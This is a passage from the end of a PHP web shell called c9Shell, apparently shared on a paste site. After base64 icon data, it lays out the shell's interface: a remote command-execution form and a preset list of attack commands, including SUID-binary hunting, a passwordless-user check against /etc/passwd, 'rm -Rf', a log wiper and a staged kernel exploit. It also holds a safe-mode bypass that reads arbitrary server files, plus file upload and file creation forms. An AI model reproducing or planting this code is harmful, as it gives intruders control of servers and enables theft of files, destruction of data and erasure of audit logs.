- "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
- "Wq/NknbbSgAAOw==",
- "ext_hpp"=>
- "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
- "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
- "UqUagnbLdZa+YFcCADs=",
- "ext_htaccess"=>
- "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
- "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
- "AAA7",
- "ext_html"=>
- "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
- "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
- "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
- "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
- "ADs=",
- "ext_jpg"=>
- "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
- "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
- "FxEAOw==",
- "ext_js"=>
- "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
- "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
- "a00AjYYBbc/o9HjNniUAADs=",
- "ext_lnk"=>
- "R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO".
- "NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi".
- "Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk".
- "AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG".
- "MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5".
- "NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf".
- "1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ".
- "ADs=",
- "ext_log"=>
- "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
- "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
- "ext_php"=>
- "R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg".
- "t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==",
- "ext_pl"=>
- "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
- "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
- "ext_swf"=>
- "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
- "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
- "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
- "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
- "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
- "ext_tar"=>
- "R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC".
- "Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF".
- "HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD".
- "UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p".
- "uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg".
- "GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd".
- "HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB".
- "u4tLAgEAOw==",
- "ext_txt"=>
- "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
- "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
- "UpPWG3Ig6Hq/XmRjuZwkAAA7",
- "ext_wri"=>
- "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
- "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
- "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
- "ext_xml"=>
- "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
- "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
- "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
- "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
- "IQA7"
- );
- //For simple size- and speed-optimization.
- $imgequals = array(
- "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
- "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
- "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
- "ext_html"=>array("ext_html","ext_htm"),
- "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
- "ext_lnk"=>array("ext_lnk","ext_url"),
- "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
- "ext_doc"=>array("ext_doc","ext_dot"),
- "ext_js"=>array("ext_js","ext_vbs"),
- "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
- "ext_wri"=>array("ext_wri","ext_rtf"),
- "ext_swf"=>array("ext_swf","ext_fla"),
- "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
- "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
- );
- if (!$getall)
- {
- header("Content-type: image/gif");
- header("Cache-control: public");
- header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
- header("Cache-control: max-age=".(60*60*24*7));
- header("Last-Modified: ".date("r",filemtime(__FILE__)));
- foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
- if (empty($images[$img])) {$img = "small_unk";}
- if (in_array($img,$ext_tar)) {$img = "ext_tar";}
- echo base64_decode($images[$img]);
- }
- else
- {
- foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
- natsort($images);
- $k = array_keys($images);
- echo "<center>";
- foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
- echo "</center>";
- }
- exit;
- }
- if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[ccam].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>";}
- ?>
- </td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
- <tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
- <tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1"> <input type=submit name=submit value="Execute"></form></td></tr></TABLE>
- <br>
- <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
- <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr>
- <tr>
- <td width="50%" height="83" valign="top"><center>
- <div align="center">Useful Commands
- </div>
- <form action="<?php echo $surl; ?>">
- <div align="center">
- <input type=hidden name=act value="cmd">
- <input type=hidden name="d" value="<?php echo $dispd; ?>">
- <SELECT NAME="cmd">
- <OPTION VALUE="uname -a">Kernel version
- <OPTION VALUE="w">Logged in users
- <OPTION VALUE="lastlog">Last to connect
- <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
- <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
- <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
- <OPTION VALUE="which wget curl w3m lynx">Downloaders?
- <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
- <OPTION VALUE="netstat -atup | grep IST">Open ports
- <OPTION VALUE="locate gcc">gcc installed?
- <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
- <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
- <OPTION VALUE="./zap2">WIPELOGS PT3
- <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
- <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
- <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
- <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
- <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)
- </SELECT>
- <input type=hidden name="cmd_txt" value="1">
-
- <input type=submit name=submit value="Execute">
- <br>
- Warning. Kernel may be alerted using higher levels </div>
- </form>
- </td>
- <td width="50%" height="83" valign="top"><center>
- <center>Kernel Info: <form name="form1" method="get" action="http://google.com/search">
- <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>">
- <input type="hidden" name="client" value="firefox-a">
- <input type="hidden" name="rls" value="org.mozilla:en-US:official">
- <input type="hidden" name="hl" value="en">
- <input type="hidden" name="hs" value="b7p">
- <input type=submit name="btnG" VALUE="Search">
- </form></center>
- </td>
- </tr></TABLE><br>
- <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
- <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr>
- <tr>
- <td width="50%" height="83" valign="top"><center>
- <div align="center">Php Safe-Mode Bypass (Read Files)
- </div><br>
- <form action="<?php echo $surl; ?>">
- <div align="center">
- File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
- <?php
- function rsg_read()
- {
- $test="";
- $temp=tempnam($test, "cx");
- $file=$_GET['file'];
- $get=htmlspecialchars($file);
- echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
- if(copy("compress.zlib://".$file, $temp)){
- $fichier = fopen($temp, "r");
- $action = fread($fichier, filesize($temp));
- fclose($fichier);
- $source=htmlspecialchars($action);
- echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
- unlink($temp);
- } else {
- die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
- <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
- access.</CENTER></FONT>");
- }
- echo "</div>";
- }
- if(isset($_GET['file']))
- {
- rsg_read();
- }
- ?>
- <?php
- function rsg_glob()
- {
- $chemin=$_GET['directory'];
- $files = glob("$chemin*");
- echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
- foreach ($files as $filename) {
- echo "<pre>";
- echo "$filename\n";
- echo "</pre>";
- }
- }
- if(isset($_GET['directory']))
- {
- rsg_glob();
- }
- ?>
- <br>
- </div>
- </form>
- </td>
- <td width="50%" height="83" valign="top"><center>
- <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>">
- <div align="center"><br>
- Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
- </form></center>
- </td>
- </tr></TABLE><br>
- <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
- <tr>
- <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked> - regexp <input type=submit name=submit value="Search"></form></center></p></td>
- <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1"> <input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
- </tr>
- </table>
- <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit"> <input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
- <br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go"></form></center></td></tr></table>
- <br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c9Shell v. <?php echo $shver; ?> Modded by <a href="http://weblazer.blade83.de/"><font color="#FF0000">Blade83</font></a> & <a href="https://www.facebook.com/inj3ct0rs"><font color="#FF0000">r00t3r</font></a> | <font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
- </body></html><?php chdir($lastdir); c999shexit(); } ?>
Add Comment
Please, Sign In to add comment